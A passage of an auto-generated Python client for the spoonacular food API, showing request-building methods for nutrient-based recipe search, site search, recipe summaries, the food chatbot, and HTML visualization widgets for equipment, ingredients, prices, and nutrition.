        ('min_copper', 'minCopper'), ('max_copper', 'maxCopper'),
        ('min_calcium', 'minCalcium'), ('max_calcium', 'maxCalcium'),
        ('min_choline', 'minCholine'), ('max_choline', 'maxCholine'),
        ('min_cholesterol', 'minCholesterol'), ('max_cholesterol', 'maxCholesterol'),
        ('min_fluoride', 'minFluoride'), ('max_fluoride', 'maxFluoride'),
        ('min_saturated_fat', 'minSaturatedFat'), ('max_saturated_fat', 'maxSaturatedFat'),
        ('min_vitamin_a', 'minVitaminA'), ('max_vitamin_a', 'maxVitaminA'),
        ('min_vitamin_c', 'minVitaminC'), ('max_vitamin_c', 'maxVitaminC'),
        ('min_vitamin_d', 'minVitaminD'), ('max_vitamin_d', 'maxVitaminD'),
        ('min_vitamin_e', 'minVitaminE'), ('max_vitamin_e', 'maxVitaminE'),
        ('min_vitamin_k', 'minVitaminK'), ('max_vitamin_k', 'maxVitaminK'),
        ('min_vitamin_b1', 'minVitaminB1'), ('max_vitamin_b1', 'maxVitaminB1'),
        ('min_vitamin_b2', 'minVitaminB2'), ('max_vitamin_b2', 'maxVitaminB2'),
        ('min_vitamin_b5', 'minVitaminB5'), ('max_vitamin_b5', 'maxVitaminB5'),
        ('min_vitamin_b3', 'minVitaminB3'), ('max_vitamin_b3', 'maxVitaminB3'),
        ('min_vitamin_b6', 'minVitaminB6'), ('max_vitamin_b6', 'maxVitaminB6'),
        ('min_vitamin_b12', 'minVitaminB12'), ('max_vitamin_b12', 'maxVitaminB12'),
        ('min_fiber', 'minFiber'), ('max_fiber', 'maxFiber'),
        ('min_folate', 'minFolate'), ('max_folate', 'maxFolate'),
        ('min_folic_acid', 'minFolicAcid'), ('max_folic_acid', 'maxFolicAcid'),
        ('min_iodine', 'minIodine'), ('max_iodine', 'maxIodine'),
        ('min_iron', 'minIron'), ('max_iron', 'maxIron'),
        ('min_magnesium', 'minMagnesium'), ('max_magnesium', 'maxMagnesium'),
        ('min_manganese', 'minManganese'), ('max_manganese', 'maxManganese'),
        ('min_phosphorus', 'minPhosphorus'), ('max_phosphorus', 'maxPhosphorus'),
        ('min_potassium', 'minPotassium'), ('max_potassium', 'maxPotassium'),
        ('min_selenium', 'minSelenium'), ('max_selenium', 'maxSelenium'),
        ('min_sodium', 'minSodium'), ('max_sodium', 'maxSodium'),
        ('min_sugar', 'minSugar'), ('max_sugar', 'maxSugar'),
        ('min_zinc', 'minZinc'), ('max_zinc', 'maxZinc'),
        ('offset', 'offset'), ('number', 'number'),
        ('random', 'random'), ('limit_license', 'limitLicense'),
    ]

    all_params = [py_name for py_name, _ in param_map]
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_recipes_by_nutrients" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    # Forward only the filters the caller actually supplied, preserving
    # the table's order in the query string.
    query_params = [
        (api_name, local_var_params[py_name])
        for py_name, api_name in param_map
        if py_name in local_var_params
    ]

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/findByNutrients', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_site_content(self, query, **kwargs):  # noqa: E501
    """Search Site Content  # noqa: E501

    Search spoonacular's site content. You'll be able to find everything
    that you could also find using the search suggestions on
    spoonacular.com. This is a suggest API so you can send partial
    strings as queries.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_site_content(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The query to search for. You can also use partial queries such as \"spagh\" to already find spaghetti recipes, articles, grocery products, and other content. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: callers get just the payload, never the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns either the request
    # thread (async_req=True) or the deserialized data.
    return self.search_site_content_with_http_info(query, **kwargs)  # noqa: E501
def search_site_content_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search Site Content  # noqa: E501

    Search spoonacular's site content. You'll be able to find everything
    that you could also find using the search suggestions on
    spoonacular.com. This is a suggest API so you can send partial
    strings as queries.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.search_site_content_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The query to search for. You can also use partial queries such as \"spagh\" to already find spaghetti recipes, articles, grocery products, and other content. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    local_var_params = locals()

    # Names accepted as keyword arguments: the endpoint parameter plus
    # the standard per-call transport options.
    all_params = ['query']  # noqa: E501
    all_params.extend([
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ])

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_site_content" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `search_site_content`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # 'query' is a required positional, so it is always present here.
    query_params = [('query', local_var_params['query'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/site/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def summarize_recipe(self, id, **kwargs):  # noqa: E501
    """Summarize Recipe  # noqa: E501

    Automatically generate a short description that summarizes key
    information about the recipe.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.summarize_recipe(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: callers get just the payload, never the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns either the request
    # thread (async_req=True) or the deserialized data.
    return self.summarize_recipe_with_http_info(id, **kwargs)  # noqa: E501
def summarize_recipe_with_http_info(self, id, **kwargs):  # noqa: E501
    """Summarize Recipe  # noqa: E501
    Automatically generate a short description that summarizes key information about the recipe.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.summarize_recipe_with_http_info(id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method summarize_recipe" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `summarize_recipe`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    # 'id' fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/recipes/{id}/summary', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def talk_to_chatbot(self, text, **kwargs):  # noqa: E501
    """Talk to Chatbot  # noqa: E501

    Have a conversation about food with the spoonacular chatbot. Use the
    \"Get Conversation Suggests\" endpoint to show your user what he or she
    can say.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.talk_to_chatbot(text, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str text: The request / question / answer from the user to the chatbot. (required)
    :param str context_id: An arbitrary globally unique id for your conversation. The conversation can contain states so you should pass your context id if you want the bot to be able to remember the conversation.
    :return: object (or the request thread when called asynchronously)
    """
    # Convenience wrapper: strip the (data, status, headers) tuple down
    # to just the payload.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.talk_to_chatbot_with_http_info(text, **kwargs)  # noqa: E501
def talk_to_chatbot_with_http_info(self, text, **kwargs):  # noqa: E501
    """Talk to Chatbot  # noqa: E501
    This endpoint can be used to have a conversation about food with the spoonacular chatbot. Use the \"Get Conversation Suggests\" endpoint to show your user what he or she can say.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.talk_to_chatbot_with_http_info(text, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str text: The request / question / answer from the user to the chatbot. (required)
    :param str context_id: An arbitrary globally unique id for your conversation. The conversation can contain states so you should pass your context id if you want the bot to be able to remember the conversation.
    :return: object
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['text', 'context_id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method talk_to_chatbot" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'text' is set
    if ('text' not in local_var_params or
            local_var_params['text'] is None):
        raise ApiValueError("Missing the required parameter `text` when calling `talk_to_chatbot`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    path_params = {}
    # Inputs are sent as URL query parameters; note the snake_case ->
    # camelCase rename for 'context_id'.
    query_params = []
    if 'text' in local_var_params:
        query_params.append(('text', local_var_params['text']))  # noqa: E501
    if 'context_id' in local_var_params:
        query_params.append(('contextId', local_var_params['context_id']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/food/converse', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_equipment(self, instructions, **kwargs):  # noqa: E501
    """Visualize Equipment  # noqa: E501

    Visualize the equipment used to make a recipe. You can play around
    with that endpoint!  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_equipment(instructions, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str instructions: The recipe's instructions. (required)
    :param str view: How to visualize the equipment, either \\\"grid\\\" or \\\"list\\\".
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_equipment_with_http_info(instructions, **kwargs)  # noqa: E501
def visualize_equipment_with_http_info(self, instructions, **kwargs):  # noqa: E501
    """Visualize Equipment  # noqa: E501
    Visualize the equipment used to make a recipe. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_equipment_with_http_info(instructions, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str instructions: The recipe's instructions. (required)
    :param str view: How to visualize the equipment, either \\\"grid\\\" or \\\"list\\\".
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['instructions', 'view', 'default_css', 'show_backlink']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_equipment" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'instructions' is set
    if ('instructions' not in local_var_params or
            local_var_params['instructions'] is None):
        raise ApiValueError("Missing the required parameter `instructions` when calling `visualize_equipment`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    # Inputs are sent as a form-encoded POST body; note the snake_case ->
    # camelCase renames for defaultCss and showBacklink.
    form_params = []
    local_var_files = {}
    if 'instructions' in local_var_params:
        form_params.append(('instructions', local_var_params['instructions']))  # noqa: E501
    if 'view' in local_var_params:
        form_params.append(('view', local_var_params['view']))  # noqa: E501
    if 'default_css' in local_var_params:
        form_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    if 'show_backlink' in local_var_params:
        form_params.append(('showBacklink', local_var_params['show_backlink']))  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/recipes/visualizeEquipment', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_ingredients(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Ingredients  # noqa: E501

    Visualize ingredients of a recipe. You can play around with that
    endpoint!  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_ingredients(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param str measure: The original system of measurement, either \\\"metric\\\" or \\\"us\\\".
    :param str view: How to visualize the ingredients, either \\\"grid\\\" or \\\"list\\\".
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_ingredients_with_http_info(ingredient_list, servings, **kwargs)  # noqa: E501
def visualize_ingredients_with_http_info(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Ingredients  # noqa: E501
    Visualize ingredients of a recipe. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_ingredients_with_http_info(ingredient_list, servings, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param str measure: The original system of measurement, either \\\"metric\\\" or \\\"us\\\".
    :param str view: How to visualize the ingredients, either \\\"grid\\\" or \\\"list\\\".
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['ingredient_list', 'servings', 'measure', 'view', 'default_css', 'show_backlink']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_ingredients" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'ingredient_list' is set
    if ('ingredient_list' not in local_var_params or
            local_var_params['ingredient_list'] is None):
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_ingredients`")  # noqa: E501
    # verify the required parameter 'servings' is set
    if ('servings' not in local_var_params or
            local_var_params['servings'] is None):
        raise ApiValueError("Missing the required parameter `servings` when calling `visualize_ingredients`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    # Inputs are sent as a form-encoded POST body; note the snake_case ->
    # camelCase renames for ingredientList, defaultCss and showBacklink.
    form_params = []
    local_var_files = {}
    if 'ingredient_list' in local_var_params:
        form_params.append(('ingredientList', local_var_params['ingredient_list']))  # noqa: E501
    if 'servings' in local_var_params:
        form_params.append(('servings', local_var_params['servings']))  # noqa: E501
    if 'measure' in local_var_params:
        form_params.append(('measure', local_var_params['measure']))  # noqa: E501
    if 'view' in local_var_params:
        form_params.append(('view', local_var_params['view']))  # noqa: E501
    if 'default_css' in local_var_params:
        form_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    if 'show_backlink' in local_var_params:
        form_params.append(('showBacklink', local_var_params['show_backlink']))  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/recipes/visualizeIngredients', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_menu_item_nutrition_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Menu Item Nutrition by ID  # noqa: E501

    Visualize a menu item's nutritional information as HTML including
    CSS.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_menu_item_nutrition_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The menu item id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_menu_item_nutrition_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_menu_item_nutrition_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Menu Item Nutrition by ID  # noqa: E501
    Visualize a menu item's nutritional information as HTML including CSS.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_menu_item_nutrition_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param float id: The menu item id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['id', 'default_css']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_menu_item_nutrition_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_menu_item_nutrition_by_id`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    # 'id' fills the {id} placeholder in the request path; 'default_css'
    # is sent as the camelCase query parameter defaultCss.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/food/menuItems/{id}/nutritionWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_price_breakdown(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Price Breakdown  # noqa: E501

    Visualize the price breakdown of a recipe. You can play around with
    that endpoint!  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_price_breakdown(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param float mode: The mode in which the widget should be delivered. 1 = separate views (compact), 2 = all in one view (full).
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_price_breakdown_with_http_info(ingredient_list, servings, **kwargs)  # noqa: E501
def visualize_price_breakdown_with_http_info(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Price Breakdown  # noqa: E501
    Visualize the price breakdown of a recipe. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_price_breakdown_with_http_info(ingredient_list, servings, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param float mode: The mode in which the widget should be delivered. 1 = separate views (compact), 2 = all in one view (full).
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['ingredient_list', 'servings', 'mode', 'default_css', 'show_backlink']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_price_breakdown" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'ingredient_list' is set
    if ('ingredient_list' not in local_var_params or
            local_var_params['ingredient_list'] is None):
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_price_breakdown`")  # noqa: E501
    # verify the required parameter 'servings' is set
    if ('servings' not in local_var_params or
            local_var_params['servings'] is None):
        raise ApiValueError("Missing the required parameter `servings` when calling `visualize_price_breakdown`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    # Inputs are sent as a form-encoded POST body; note the snake_case ->
    # camelCase renames for ingredientList, defaultCss and showBacklink.
    form_params = []
    local_var_files = {}
    if 'ingredient_list' in local_var_params:
        form_params.append(('ingredientList', local_var_params['ingredient_list']))  # noqa: E501
    if 'servings' in local_var_params:
        form_params.append(('servings', local_var_params['servings']))  # noqa: E501
    if 'mode' in local_var_params:
        form_params.append(('mode', local_var_params['mode']))  # noqa: E501
    if 'default_css' in local_var_params:
        form_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    if 'show_backlink' in local_var_params:
        form_params.append(('showBacklink', local_var_params['show_backlink']))  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/recipes/visualizePriceEstimator', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_product_nutrition_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Product Nutrition by ID  # noqa: E501

    Visualize a product's nutritional information as HTML including
    CSS.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_product_nutrition_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the product. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str (or the request thread when called asynchronously)
    """
